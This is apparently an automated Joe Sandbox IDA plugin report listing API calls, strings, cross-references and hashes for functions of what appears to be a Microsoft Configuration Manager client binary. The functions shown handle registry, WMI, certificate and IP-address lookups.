                                                                                          • ..\usertoken.cpp, xrefs: 0061321F
                                                                                          • Session, xrefs: 00613229
                                                                                          • Software\Microsoft\SMS\CurrentUser, xrefs: 00613174
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch$CloseH_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$,hw$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$0 != pdwSessionId$CCM::Utility::Security::GetCcmUserSessionPair$Cached CCM (user, session) is: (%s,%d).$Failed to retrieve current (user,session) pair (0x%08x).$Session$Software\Microsoft\SMS\CurrentUser$UserSID$shUserKey.GetDword(c_szCcmCachedUserSessionIDValue, pdwSessionId)$shUserKey.GetString(c_szCcmCachedUserValue, sUserSid)$shUserKey.Open( (( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szCcmCachedUserKey, ((((0x00020000L)) | (0x0001) | (0x0008) | (0x0010
                                                                                          • API String ID: 288237175-2138071032
                                                                                          • Opcode ID: d7e6bc145ff061cf3deee1a26870513bdc5935cf65fae9b92dc5ea59bb2cc542
                                                                                          • Instruction ID: e6420e4c8695a33889c2683851ea26445fcaf1556505f9f5790d082aebe08a56
                                                                                          • Opcode Fuzzy Hash: d7e6bc145ff061cf3deee1a26870513bdc5935cf65fae9b92dc5ea59bb2cc542
                                                                                          • Instruction Fuzzy Hash: 5F51E471980665BACF10EBA08D0EBEE7E616F41B54F188044F9097B3C2C7B95B45C7A1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060311B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060316E
                                                                                            • Part of subcall function 0060147F: CoQueryProxyBlanket.OLE32(00000002,0000000A,00000008,00000000,?,00000000,00000000,00000000,00000000), ref: 006014B8
                                                                                            • Part of subcall function 0060147F: CoSetProxyBlanket.COMBASE(00000002,000000FF,000000FF,00000000,00000000,00000003,00000000,00000020), ref: 006014E2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006031CD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603257
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006032D4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060331D
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006031C8
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006032C4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006032CF
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00603325
                                                                                          • CCM::Utility::Wmi::Namespace::Open, xrefs: 00603127
                                                                                          • ..\WmiNamespace.cpp, xrefs: 0060330D
                                                                                          • pParentNamespace->OpenNamespace( BString(pszNamespace), 0, pContext, NamespacePtr::operator &(), NULL ), xrefs: 0060324D
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006031BD
                                                                                          • ..\WmiNamespace.cpp, xrefs: 0060325F
                                                                                          • ..\WmiNamespace.cpp, xrefs: 0060315E
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006032DC
                                                                                          • SetNamespacePath(), xrefs: 006032CA
                                                                                          • ..\WmiNamespace.cpp, xrefs: 0060317A
                                                                                          • pParentNamespace != 0, xrefs: 00603164
                                                                                          • pszNamespace != 0, xrefs: 006031C3
                                                                                          • AllowImpersonation(getPointer()), xrefs: 00603313
                                                                                          • Failed to open to WMI namespace '%s' (%08lx), xrefs: 00603285
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00603169
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00603252
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00603245
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006031D9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00603318
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$BlanketProxy$H_prolog3_catchQuery
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$AllowImpersonation(getPointer())$CCM::Utility::Wmi::Namespace::Open$Failed to open to WMI namespace '%s' (%08lx)$SetNamespacePath()$pParentNamespace != 0$pParentNamespace->OpenNamespace( BString(pszNamespace), 0, pContext, NamespacePtr::operator &(), NULL )$pszNamespace != 0
                                                                                          • API String ID: 2266875516-2336866345
                                                                                          • Opcode ID: 0b1821843909ace47b55ee4370504216f83354f538312c1827c89a1d3670a513
                                                                                          • Instruction ID: 600390a66539ccc8c31bd51ee167f2768deb4cc950f4a64e6aed6ff9628f30b4
                                                                                          • Opcode Fuzzy Hash: 0b1821843909ace47b55ee4370504216f83354f538312c1827c89a1d3670a513
                                                                                          • Instruction Fuzzy Hash: 7C51D6B1A80355BACB119F908C0ABEF7F2AAF95B11F148045F9047B3C1C7B95A01C7A6
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00622149
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006221AF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062220F
                                                                                          • CertNameToStrW.CRYPT32(00000001,?,42000003,00000000,00000000), ref: 0062223D
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 0062224A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00622280
                                                                                          • CertNameToStrW.CRYPT32(00000001,?,42000003,?,?), ref: 006222CF
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 006222D9
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062230F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CertErrorLastName$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$0 != pCertContext$0 != pCertContext->pCertInfo$CcmUtilLib::CcmGetCertIssuer$Failed to get certificate issuer. Error 0x%x$dwIssuerLength != 0$dwIssuerLength != 0
                                                                                          • API String ID: 292872062-1564745813
                                                                                          • Opcode ID: 50b18a120f61ea3921da413d881c19feff2da16dce2fa7be23f34acdf0499c2c
                                                                                          • Instruction ID: d318a2ab24f69f0898e0927dc8a348b584740cd39f64997d62ddde96bce6255e
                                                                                          • Opcode Fuzzy Hash: 50b18a120f61ea3921da413d881c19feff2da16dce2fa7be23f34acdf0499c2c
                                                                                          • Instruction Fuzzy Hash: 4D5118B1A40316FADB11EBA49C1AFEE7FA5AF44B10F144115FA00FB2C1D7794A01CB62
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00622394
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006223F4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00622452
                                                                                          • CertNameToStrW.CRYPT32(00000001,?,02000003,00000000,00000000), ref: 0062246F
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 0062247C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006224B2
                                                                                          • CertNameToStrW.CRYPT32(00000001,?,02000003,?,?), ref: 00622500
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 0062250A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00622540
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CertErrorLastName$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$CcmUtilLib::CcmGetCertNameStr$CertNameBlob.cbData > 0$CertNameBlob.pbData != 0$Failed to get certificate subject name. Error 0x%x]$dwSubjectLength != 0$dwSubjectLength != 0
                                                                                          • API String ID: 292872062-110678374
                                                                                          • Opcode ID: 21f7e100c6b4db04b44d85d9ad02c08d51fee63a094f173f8aa1536d75b9947f
                                                                                          • Instruction ID: cfe91640b292f68962a13326e1cea7794376b20642a3fe6b8b3ad5e2d27edd18
                                                                                          • Opcode Fuzzy Hash: 21f7e100c6b4db04b44d85d9ad02c08d51fee63a094f173f8aa1536d75b9947f
                                                                                          • Instruction Fuzzy Hash: EB514C71680756BAEB20FFA49C1EFEE7EA6AF50B10F144105F914BB3C1D7784A41CAA1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060B1ED
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B24A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B2A5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B2E6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B341
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B390
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$CCM::Utility::Wmi::Object::CreateMethodInParams$getPointer()->GetMethod(pszMethod, 0, &spInClass, 0)$null() == false$ppInParams != 0$pszMethod != 0$spInClass->SpawnInstance(0, ppInParams)
                                                                                          • API String ID: 981364226-1820322647
                                                                                          • Opcode ID: cba5faca8814a5e0b76fb5fd8160b72f29ca46228fe06cd64bf5c1f1fe1eeec9
                                                                                          • Instruction ID: 85216160a124eed5eb57bf466a15075da36b64d7f37c9a4d8d49517edfebc2b7
                                                                                          • Opcode Fuzzy Hash: cba5faca8814a5e0b76fb5fd8160b72f29ca46228fe06cd64bf5c1f1fe1eeec9
                                                                                          • Instruction Fuzzy Hash: 8341E1B1AC0244AADB14ABA08C0AFFF7E25AF90B16F249045FD047B2C1C7B95B09C795
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F92ED
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 005B14FC: __EH_prolog3.LIBCMT ref: 005B1503
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 00603360: __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 00603360: GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F937B
                                                                                            • Part of subcall function 0060C143: __EH_prolog3_catch.LIBCMT ref: 0060C14A
                                                                                            • Part of subcall function 0060C143: GetCurrentThreadId.KERNEL32 ref: 0060C1A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F93EF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F943D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F94AC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catch_$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$CCM::Utility::CcmGetOSVersion$CcmGetOSVersion failed with 0x%x$Version$WBEM_NO_ERROR == spEnum.Next(&spObject)$root\cimv2$select * from Win32_OperatingSystem$spCimV2.Open(L"root\\cimv2")$spCimV2.Query(c_szWmi_Win32OS_Query, &spEnum)$spObject.GetString(c_szWmi_Version, sOSVersion)
                                                                                          • API String ID: 3275092694-3775640110
                                                                                          • Opcode ID: 24e28a01e712a8e85648dcec279c90aaeb527570fcab7c42bb04c7bff29da5b3
                                                                                          • Instruction ID: 70f6184feddca8f65819861fd8c4cc9c3fc45c29fe9f828ce6c62a92d282aac1
                                                                                          • Opcode Fuzzy Hash: 24e28a01e712a8e85648dcec279c90aaeb527570fcab7c42bb04c7bff29da5b3
                                                                                          • Instruction Fuzzy Hash: 6451A1B0D84758AAEB25EBA4CD1ABEE7F64BF50B00F144059F5017B2C2CBB81B06C751
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B7265
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B72F2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B736A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B73BF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B740E
                                                                                          Strings
                                                                                          • SOFTWARE\Microsoft\SMS\Operations Management\SMS Server Role\SMS Management Point, xrefs: 005B737E
                                                                                          • util.cpp, xrefs: 005B735A
                                                                                          • util.cpp, xrefs: 005B73FE
                                                                                          • regKey.GetString(L"Version", sVersion), xrefs: 005B7404
                                                                                          • util.cpp, xrefs: 005B73C7
                                                                                          • util.cpp, xrefs: 005B72FA
                                                                                          • regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), L"SOFTWARE\\Microsoft\\SMS\\Operations Management\\SMS Server Role\\SMS Man, xrefs: 005B73B5
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B72ED
                                                                                          • regKey.Close(), xrefs: 005B7360
                                                                                          • util.cpp, xrefs: 005B7372
                                                                                          • Version, xrefs: 005B73D2
                                                                                          • util.cpp, xrefs: 005B7416
                                                                                          • Software\Microsoft\SMS, xrefs: 005B72B5
                                                                                          • Full Version, xrefs: 005B7320
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B7365
                                                                                          • util.cpp, xrefs: 005B73AF
                                                                                          • util.cpp, xrefs: 005B72E2
                                                                                          • regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), L"Software\\Microsoft\\SMS", ulAccess), xrefs: 005B72E8
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B73BA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B7409
                                                                                          • GetMPSiteVersion, xrefs: 005B7281
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch$CloseH_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$Full Version$GetMPSiteVersion$SOFTWARE\Microsoft\SMS\Operations Management\SMS Server Role\SMS Management Point$Software\Microsoft\SMS$Version$regKey.Close()$regKey.GetString(L"Version", sVersion)$regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), L"SOFTWARE\\Microsoft\\SMS\\Operations Management\\SMS Server Role\\SMS Man$regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), L"Software\\Microsoft\\SMS", ulAccess)$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 288237175-2477930119
                                                                                          • Opcode ID: 55ab44126180fb186dfc45261e1e980fc5ae2170ee661e14893061405c3aa3f5
                                                                                          • Instruction ID: e192f1abb3aff2834de415ad1b1d8ae74d20cd5267ad405dba46b79463ae9bee
                                                                                          • Opcode Fuzzy Hash: 55ab44126180fb186dfc45261e1e980fc5ae2170ee661e14893061405c3aa3f5
                                                                                          • Instruction Fuzzy Hash: 9541B331D8434AEACB10EBA0D91AFFE7E76AB95B10F1A1006F900773C1C7645A05D791
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0062C0DE
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F67E1: __EH_prolog3_catch.LIBCMT ref: 005F67E8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062C14F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062C1C0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062C217
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062C271
                                                                                          Strings
                                                                                          • AADAuthUrl, xrefs: 0062C235
                                                                                          • regKey.SetString(c_szClientAppId_RegValue, sClientAppId), xrefs: 0062C1B6
                                                                                          • ..\CcmToken.cpp, xrefs: 0062C261
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062C26C
                                                                                          • ..\CcmToken.cpp, xrefs: 0062C13F
                                                                                          • SOFTWARE\Microsoft\CCM\AADConfigs, xrefs: 0062C112
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062C1BB
                                                                                          • CcmUtilLib::UpdateAADOnboardingInfo, xrefs: 0062C0F3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062C212
                                                                                          • regKey.Create((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szAADConfigs_RegKey, ((((0x00020000L)) | (0x0002) | (0x0004)) & (~(0x00, xrefs: 0062C145
                                                                                          • ..\CcmToken.cpp, xrefs: 0062C279
                                                                                          • ..\CcmToken.cpp, xrefs: 0062C157
                                                                                          • ..\CcmToken.cpp, xrefs: 0062C1B0
                                                                                          • regKey.SetString(c_szResourceUri_RegValue, sAADResourceUri ), xrefs: 0062C20D
                                                                                          • ..\CcmToken.cpp, xrefs: 0062C1C8
                                                                                          • ClientAppId, xrefs: 0062C188
                                                                                          • ..\CcmToken.cpp, xrefs: 0062C21F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062C14A
                                                                                          • regKey.SetString(c_szAADAuthUrl_RegValue, sAADAuthUrl ), xrefs: 0062C267
                                                                                          • ResourceUri, xrefs: 0062C1DB
                                                                                          • ..\CcmToken.cpp, xrefs: 0062C207
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch$CloseH_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$AADAuthUrl$CcmUtilLib::UpdateAADOnboardingInfo$ClientAppId$ResourceUri$SOFTWARE\Microsoft\CCM\AADConfigs$regKey.Create((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szAADConfigs_RegKey, ((((0x00020000L)) | (0x0002) | (0x0004)) & (~(0x00$regKey.SetString(c_szAADAuthUrl_RegValue, sAADAuthUrl )$regKey.SetString(c_szClientAppId_RegValue, sClientAppId)$regKey.SetString(c_szResourceUri_RegValue, sAADResourceUri )
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005FA305
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FA34F
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,CCM::Core::ConvertAnsiToUnicode,00000014,005F4EEB,00000000,`)l,CCM::Utility::String::assign,00000034,005F4151,?,00000004), ref: 005FA388
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 005FA395
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FA3C7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FA40B
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,?,00000000,?,0058B3CC,?,?,?,?,?,00938B28,00000001), ref: 005FA430
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 005FA43E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FA474
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$ByteCharErrorLastMultiWide$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(szUnicode.resize(nLength) == true) != 0$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$CCM::Core::ConvertAnsiToUnicode$MultiByteToWideChar(0, 0, pszAnsi, -1, szUnicode, nLength) > 0$nLength > 0$pszAnsi != 0
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006751DC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0067525C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006752BC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0067532F
                                                                                          • CoTaskMemAlloc.OLE32(?,?,?,CcmUtilLib::CcmGetIPAddressInformation,00000050,00648A05,?,?,CCM::LocationServices::LSGetSubnetBoundaries,00000088,0064242A,?,00000000,00000000,000000FF,CCM::LocationServices::LSGetAssignedSiteFromAD), ref: 006753C6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006753FC
                                                                                          Strings
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00675404
                                                                                          • Failed to retrieve IP subnet information (0x%08x)., xrefs: 00675515
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 0067533B
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006752AC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006752B7
                                                                                          • 0 != pdwLen, xrefs: 006752B2
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 0067531F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006753F7
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006752C8
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006753EC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00675257
                                                                                          • GetIPV4AddressInformation(vecIPV4Info), xrefs: 00675325
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0067532A
                                                                                          • 0 != ppInfo, xrefs: 00675252
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00675268
                                                                                          • CcmUtilLib::CcmGetIPAddressInformation, xrefs: 00675214
                                                                                          • Failed to retrieve IPV6 address information., xrefs: 00675372
                                                                                          • (pSubnetInfo) != 0, xrefs: 006753F2
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 0067524C
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$AllocH_prolog3_catchTask
